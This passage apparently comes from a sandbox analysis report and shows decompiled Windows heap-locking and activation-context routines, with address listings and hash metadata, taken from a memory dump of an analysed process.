                                                                                                                                                                                      					E1D83B910(", passed to %s", "RtlUnlockHeap");
                                                                                                                                                                                      					_push("\n");
                                                                                                                                                                                      					E1D83B910();
                                                                                                                                                                                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                                                                                      						 *0x1d9347a1 = 1;
                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                      						 *0x1d9347a1 = 0;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
                                                                                                                                                                                      				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
                                                                                                                                                                                      				_t13 = _t92 + 8;
                                                                                                                                                                                      				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
                                                                                                                                                                                      				if( *_t13 != 0) {
                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
                                                                                                                                                                                      				_t87 = _t92 + 4;
                                                                                                                                                                                      				_t65 = 0xfffffffe;
                                                                                                                                                                                      				asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                      				_v12 = 0xffff;
                                                                                                                                                                                      				if(_t65 != 0xfffffffe) {
                                                                                                                                                                                      					if(( *_t87 & 0x00000001) != 0) {
                                                                                                                                                                                      						E1D8DAA40(_t92);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t72 =  *((intOrPtr*)(_t92 + 0x10));
                                                                                                                                                                                      					_v8 = _t72;
                                                                                                                                                                                      					if(_t72 == 0) {
                                                                                                                                                                                      						_v8 = E1D86FEC0(_t92);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_v16 = _v16 & 0x00000000;
                                                                                                                                                                                      					_t95 = _t92 + 4;
                                                                                                                                                                                      					_t73 = _v12;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						_t90 = _t73 & 0x00000002 | 0x00000001;
                                                                                                                                                                                      						_t82 = _t90 + _t73;
                                                                                                                                                                                      						asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                      						if(_t73 == _t73) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E1D86BAC0(_t82,  &_v16);
                                                                                                                                                                                      						_t73 =  *_t95;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t93 = _a4;
                                                                                                                                                                                      					_t74 = _v8;
                                                                                                                                                                                      					if((_t90 & 0x00000002) != 0) {
                                                                                                                                                                                      						E1D86F300(_t92, _t74);
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L6;
                                                                                                                                                                                      			}



















                                                                                                                                                                                      0x1d86da2a
                                                                                                                                                                                      0x1d86da35
                                                                                                                                                                                      0x1d8af408
                                                                                                                                                                                      0x1d86da90
                                                                                                                                                                                      0x1d86da96
                                                                                                                                                                                      0x1d86da9b
                                                                                                                                                                                      0x1d8af510
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af51f
                                                                                                                                                                                      0x1d86daa6
                                                                                                                                                                                      0x1d86daa9
                                                                                                                                                                                      0x1d8af537
                                                                                                                                                                                      0x1d8af53f
                                                                                                                                                                                      0x1d8af53f
                                                                                                                                                                                      0x1d8af537
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86daaf
                                                                                                                                                                                      0x1d86daa1
                                                                                                                                                                                      0x1d86daa1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86daa1
                                                                                                                                                                                      0x1d86da42
                                                                                                                                                                                      0x1d8af413
                                                                                                                                                                                      0x1d8af41b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af421
                                                                                                                                                                                      0x1d86da4f
                                                                                                                                                                                      0x1d8af432
                                                                                                                                                                                      0x1d8af451
                                                                                                                                                                                      0x1d8af456
                                                                                                                                                                                      0x1d8af434
                                                                                                                                                                                      0x1d8af449
                                                                                                                                                                                      0x1d8af44e
                                                                                                                                                                                      0x1d8af462
                                                                                                                                                                                      0x1d8af471
                                                                                                                                                                                      0x1d8af476
                                                                                                                                                                                      0x1d8af47b
                                                                                                                                                                                      0x1d8af48d
                                                                                                                                                                                      0x1d8af48f
                                                                                                                                                                                      0x1d8af496
                                                                                                                                                                                      0x1d8af497
                                                                                                                                                                                      0x1d8af497
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af49e
                                                                                                                                                                                      0x1d86da59
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86da5b
                                                                                                                                                                                      0x1d86da66
                                                                                                                                                                                      0x1d86da6d
                                                                                                                                                                                      0x1d86da6d
                                                                                                                                                                                      0x1d86da71
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86da73
                                                                                                                                                                                      0x1d86da77
                                                                                                                                                                                      0x1d86da7f
                                                                                                                                                                                      0x1d86da80
                                                                                                                                                                                      0x1d86da84
                                                                                                                                                                                      0x1d86da8a
                                                                                                                                                                                      0x1d8af4a8
                                                                                                                                                                                      0x1d8af4ab
                                                                                                                                                                                      0x1d8af4ab
                                                                                                                                                                                      0x1d8af4b0
                                                                                                                                                                                      0x1d8af4b3
                                                                                                                                                                                      0x1d8af4b8
                                                                                                                                                                                      0x1d8af4c1
                                                                                                                                                                                      0x1d8af4c1
                                                                                                                                                                                      0x1d8af4c4
                                                                                                                                                                                      0x1d8af4c8
                                                                                                                                                                                      0x1d8af4cb
                                                                                                                                                                                      0x1d8af4ce
                                                                                                                                                                                      0x1d8af4d5
                                                                                                                                                                                      0x1d8af4d8
                                                                                                                                                                                      0x1d8af4db
                                                                                                                                                                                      0x1d8af4e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af4e7
                                                                                                                                                                                      0x1d8af4ec
                                                                                                                                                                                      0x1d8af4ec
                                                                                                                                                                                      0x1d8af4f0
                                                                                                                                                                                      0x1d8af4f3
                                                                                                                                                                                      0x1d8af4f9
                                                                                                                                                                                      0x1d8af503
                                                                                                                                                                                      0x1d8af503
                                                                                                                                                                                      0x1d8af4f9
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                                                      • Opcode ID: 311d3b28e58500ae0dd19f2c56f4988302f2f606c40259f32cc851d642f82d20
                                                                                                                                                                                      • Instruction ID: 280aa03846057c24660487f7aadc46e7d6aad6818dfa91c6ceeba362bf40811c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 311d3b28e58500ae0dd19f2c56f4988302f2f606c40259f32cc851d642f82d20
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9412736909646EFC712DF68C884B69B7A4FF40721F058568F90A8B3D1C738A984C7A3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                                                      			E1D86DAC0(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                      				char _v5;
                                                                                                                                                                                      				intOrPtr* _t25;
                                                                                                                                                                                      				char* _t26;
                                                                                                                                                                                      				char _t28;
                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                                                      				_v5 = 0xff;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
                                                                                                                                                                                      					E1D909109(_t53,  &_v5);
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                                                                      					if(_t25 != 0) {
                                                                                                                                                                                      						if( *_t25 == 0) {
                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                                      						L7:
                                                                                                                                                                                      						if( *_t26 != 0) {
                                                                                                                                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                                                                      								E1D8FF2AE(_t53);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                      						L9:
                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L6:
                                                                                                                                                                                      					_t26 = 0x7ffe0380;
                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                                      					_t55 =  *0x1d933768; // 0x0
                                                                                                                                                                                      					 *0x1d9391e0(_t53);
                                                                                                                                                                                      					_t28 =  *_t55();
                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
                                                                                                                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                                                                      						_push("HEAP: ");
                                                                                                                                                                                      						E1D83B910();
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E1D83B910("Invalid heap signature for heap at %p", _t53);
                                                                                                                                                                                      					E1D83B910(", passed to %s", "RtlLockHeap");
                                                                                                                                                                                      					_push("\n");
                                                                                                                                                                                      					E1D83B910();
                                                                                                                                                                                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                                                                                      						 *0x1d9347a1 = 1;
                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                      						 *0x1d9347a1 = 0;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t28 = 0;
                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                                                      						E1D84FED0( *((intOrPtr*)(_t53 + 0xc8)));
                                                                                                                                                                                      						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}









                                                                                                                                                                                      0x1d86dac8
                                                                                                                                                                                      0x1d86dacb
                                                                                                                                                                                      0x1d86dad6
                                                                                                                                                                                      0x1d8af54e
                                                                                                                                                                                      0x1d86db0e
                                                                                                                                                                                      0x1d86db14
                                                                                                                                                                                      0x1d86db19
                                                                                                                                                                                      0x1d8af5ee
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af5fd
                                                                                                                                                                                      0x1d86db24
                                                                                                                                                                                      0x1d86db27
                                                                                                                                                                                      0x1d8af614
                                                                                                                                                                                      0x1d8af61c
                                                                                                                                                                                      0x1d8af61c
                                                                                                                                                                                      0x1d8af614
                                                                                                                                                                                      0x1d86db2d
                                                                                                                                                                                      0x1d86db2f
                                                                                                                                                                                      0x1d86db31
                                                                                                                                                                                      0x1d86db31
                                                                                                                                                                                      0x1d86db1f
                                                                                                                                                                                      0x1d86db1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86db1f
                                                                                                                                                                                      0x1d86dae3
                                                                                                                                                                                      0x1d8af559
                                                                                                                                                                                      0x1d8af561
                                                                                                                                                                                      0x1d8af567
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8af567
                                                                                                                                                                                      0x1d86daf0
                                                                                                                                                                                      0x1d8af578
                                                                                                                                                                                      0x1d8af597
                                                                                                                                                                                      0x1d8af59c
                                                                                                                                                                                      0x1d8af57a
                                                                                                                                                                                      0x1d8af58f
                                                                                                                                                                                      0x1d8af594
                                                                                                                                                                                      0x1d8af5a8
                                                                                                                                                                                      0x1d8af5b7
                                                                                                                                                                                      0x1d8af5bc
                                                                                                                                                                                      0x1d8af5c1
                                                                                                                                                                                      0x1d8af5d3
                                                                                                                                                                                      0x1d8af5d5
                                                                                                                                                                                      0x1d8af5dc
                                                                                                                                                                                      0x1d8af5dd
                                                                                                                                                                                      0x1d8af5dd
                                                                                                                                                                                      0x1d8af5e4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86daf6
                                                                                                                                                                                      0x1d86dafa
                                                                                                                                                                                      0x1d86db02
                                                                                                                                                                                      0x1d86db07
                                                                                                                                                                                      0x1d86db07
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86dafa

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                                                      • Opcode ID: ca591f8110bfae816f86adca74f2d6bd8e8ac12d6c5e73595c9e585b400fea82
                                                                                                                                                                                      • Instruction ID: 00f4f136162e4bfd3238a5f99cd93bab34199e6a23525d6be16b52bfe34d2379
                                                                                                                                                                                      • Opcode Fuzzy Hash: ca591f8110bfae816f86adca74f2d6bd8e8ac12d6c5e73595c9e585b400fea82
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D310836508784EFD712DF28C849BB977A4EF01770F068485F4464B7A2C765F584C663
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                                      			E1D849046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				short _t95;
                                                                                                                                                                                      				intOrPtr _t110;
                                                                                                                                                                                      				short _t118;
                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                      				intOrPtr _t136;
                                                                                                                                                                                      				intOrPtr _t140;
                                                                                                                                                                                      				intOrPtr _t146;
                                                                                                                                                                                      				intOrPtr* _t148;
                                                                                                                                                                                      				intOrPtr _t151;
                                                                                                                                                                                      				intOrPtr _t152;
                                                                                                                                                                                      				intOrPtr* _t154;
                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t141 = __edx;
                                                                                                                                                                                      				_push(0x154);
                                                                                                                                                                                      				_push(0x1d91be98);
                                                                                                                                                                                      				E1D897C40(__ebx, __edi, __esi);
                                                                                                                                                                                      				 *(_t156 - 0xf0) = __edx;
                                                                                                                                                                                      				_t151 = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                                                                                                                                                                      				 *((short*)(_t156 - 0xda)) = 0;
                                                                                                                                                                                      				 *(_t156 - 0xe0) = 0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                                                                                                                                                                      				E1D888F40(_t156 - 0x13c, 0, 0x3c);
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                                                                                                                                                                      				_t131 = 7;
                                                                                                                                                                                      				memset(_t156 - 0x15c, 0, _t131 << 2);
                                                                                                                                                                                      				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                                                                                                                                                                      				_t152 = E1D859870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                                      				if(_t152 >= 0) {
                                                                                                                                                                                      					if( *0x1d9365e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t152 = E1D85A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                                                                                                                                                                      						if(_t152 < 0) {
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                                                                                                                                                                      							L11:
                                                                                                                                                                                      							_t152 = 0xc0150005;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                                                                                                                                                                      							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                                                                                                                                                                      								 *(_t156 - 0x120) = 0xfffffffc;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                                      						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                                                                                                                                                                      						 *((short*)(_t156 - 0xda)) = _t95;
                                                                                                                                                                                      						 *((short*)(_t156 - 0xdc)) = _t95;
                                                                                                                                                                                      						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                                      						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                                                                                                                                                                      						 *((short*)(_t156 - 0xea)) = 0xaa;
                                                                                                                                                                                      						_t152 = E1D865A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                                                                                                                                                                      						if(_t152 < 0 || E1D8604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t154 =  *0x1d9365e0; // 0x7728a680
                                                                                                                                                                                      							 *0x1d9391e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                                                                                                                                                                      							_t152 =  *_t154();
                                                                                                                                                                                      							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      							if(_t152 < 0) {
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                                                                                                                                                                      								if(_t110 == 0xffffffff) {
                                                                                                                                                                                      									L26:
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 1;
                                                                                                                                                                                      									_t148 =  *0x1d9365e8;
                                                                                                                                                                                      									if(_t148 != 0) {
                                                                                                                                                                                      										 *0x1d9391e0(_t110);
                                                                                                                                                                                      										 *_t148();
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                                      									goto L1;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E1D85DC40(_t156 - 0x164, _t110);
                                                                                                                                                                                      								 *((intOrPtr*)(_t156 - 4)) = 0;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                                                                                                                                                                      									E1D853B90(_t146);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                                                                                                                                                                      								_t152 = E1D859870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                                      								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      								if(_t152 < 0) {
                                                                                                                                                                                      									L25:
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                                      									_t110 = E1D8A247B();
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t152 = E1D85A170(7, 0, 2, _t149, _t156 - 0x140);
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      									if(_t152 < 0) {
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                                                                                                                                                                      										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                                      										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                                                                                                                                                                      										 *((short*)(_t156 - 0xda)) = _t118;
                                                                                                                                                                                      										 *((short*)(_t156 - 0xdc)) = _t118;
                                                                                                                                                                                      										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                                      										if(E1D8604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t152 = 0xc0150004;
                                                                                                                                                                                      										L24:
                                                                                                                                                                                      										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t152 = 0xc0150005;
                                                                                                                                                                                      									goto L24;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                                                                                                                                                                      				return _t152;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x1d849046
                                                                                                                                                                                      0x1d849046
                                                                                                                                                                                      0x1d84904b
                                                                                                                                                                                      0x1d849050
                                                                                                                                                                                      0x1d849055
                                                                                                                                                                                      0x1d84905b
                                                                                                                                                                                      0x1d84905d
                                                                                                                                                                                      0x1d849066
                                                                                                                                                                                      0x1d84906f
                                                                                                                                                                                      0x1d849078
                                                                                                                                                                                      0x1d849080
                                                                                                                                                                                      0x1d849088
                                                                                                                                                                                      0x1d84908f
                                                                                                                                                                                      0x1d849095
                                                                                                                                                                                      0x1d8490a9
                                                                                                                                                                                      0x1d8490b1
                                                                                                                                                                                      0x1d8490be
                                                                                                                                                                                      0x1d8490c6
                                                                                                                                                                                      0x1d8490cf
                                                                                                                                                                                      0x1d8490e2
                                                                                                                                                                                      0x1d8490f7
                                                                                                                                                                                      0x1d8490fb
                                                                                                                                                                                      0x1d849118
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d849123
                                                                                                                                                                                      0x1d84913b
                                                                                                                                                                                      0x1d84913f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d849147
                                                                                                                                                                                      0x1d8a231f
                                                                                                                                                                                      0x1d8a231f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a231f
                                                                                                                                                                                      0x1d849154
                                                                                                                                                                                      0x1d8a2330
                                                                                                                                                                                      0x1d8a2336
                                                                                                                                                                                      0x1d8a2336
                                                                                                                                                                                      0x1d84915a
                                                                                                                                                                                      0x1d84915a
                                                                                                                                                                                      0x1d84915a
                                                                                                                                                                                      0x1d849161
                                                                                                                                                                                      0x1d849167
                                                                                                                                                                                      0x1d84916b
                                                                                                                                                                                      0x1d849172
                                                                                                                                                                                      0x1d849182
                                                                                                                                                                                      0x1d84918e
                                                                                                                                                                                      0x1d849199
                                                                                                                                                                                      0x1d8491ba
                                                                                                                                                                                      0x1d8491be
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8491e0
                                                                                                                                                                                      0x1d8a2358
                                                                                                                                                                                      0x1d8a2360
                                                                                                                                                                                      0x1d8a2368
                                                                                                                                                                                      0x1d8a236a
                                                                                                                                                                                      0x1d8a2372
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a2378
                                                                                                                                                                                      0x1d8a2378
                                                                                                                                                                                      0x1d8a2381
                                                                                                                                                                                      0x1d8a2458
                                                                                                                                                                                      0x1d8a2458
                                                                                                                                                                                      0x1d8a245b
                                                                                                                                                                                      0x1d8a2463
                                                                                                                                                                                      0x1d8a2468
                                                                                                                                                                                      0x1d8a246e
                                                                                                                                                                                      0x1d8a246e
                                                                                                                                                                                      0x1d8a24a7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a24a7
                                                                                                                                                                                      0x1d8a238f
                                                                                                                                                                                      0x1d8a2396
                                                                                                                                                                                      0x1d8a239c
                                                                                                                                                                                      0x1d8a239f
                                                                                                                                                                                      0x1d8a239f
                                                                                                                                                                                      0x1d8a23bb
                                                                                                                                                                                      0x1d8a23c8
                                                                                                                                                                                      0x1d8a23ca
                                                                                                                                                                                      0x1d8a23d2
                                                                                                                                                                                      0x1d8a244c
                                                                                                                                                                                      0x1d8a244c
                                                                                                                                                                                      0x1d8a2453
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a23d4
                                                                                                                                                                                      0x1d8a23e7
                                                                                                                                                                                      0x1d8a23e9
                                                                                                                                                                                      0x1d8a23f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a23f9
                                                                                                                                                                                      0x1d8a2402
                                                                                                                                                                                      0x1d8a2408
                                                                                                                                                                                      0x1d8a240c
                                                                                                                                                                                      0x1d8a2413
                                                                                                                                                                                      0x1d8a2423
                                                                                                                                                                                      0x1d8a243f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a2441
                                                                                                                                                                                      0x1d8a2446
                                                                                                                                                                                      0x1d8a2446
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a2446
                                                                                                                                                                                      0x1d8a23fb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a23fb
                                                                                                                                                                                      0x1d8a23d2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a2372
                                                                                                                                                                                      0x1d8491be
                                                                                                                                                                                      0x1d849118
                                                                                                                                                                                      0x1d8490fd
                                                                                                                                                                                      0x1d849102
                                                                                                                                                                                      0x1d84910e

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                                                      • Opcode ID: baf14107e615ae4629336ffaeafb72526e5865c7657541bf526c059a0fea375f
                                                                                                                                                                                      • Instruction ID: f19c2a5821457c6c8443a807b46015f809ac633f794f9d54e878beecbce738c1
